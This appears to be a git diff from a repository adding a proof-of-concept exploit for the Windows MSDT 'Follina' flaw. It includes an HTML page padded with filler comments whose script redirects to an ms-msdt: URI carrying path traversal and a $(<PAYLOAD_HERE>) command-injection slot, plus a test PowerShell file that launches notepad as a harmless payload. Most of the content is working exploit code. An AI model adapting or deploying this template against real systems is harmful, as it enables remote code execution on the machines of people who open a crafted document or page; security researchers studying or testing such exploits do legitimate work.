// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
|
||||||
|
|
||||||
|
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../../../../../../../../../../../$(<PAYLOAD_HERE>)/.exe\"";
|
||||||
|
</script>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
1
test/calc.ps1
Normal file
1
test/calc.ps1
Normal file
|
@ -0,0 +1 @@
|
||||||
|
Start-Process('notepad')
|
Loading…
Reference in a new issue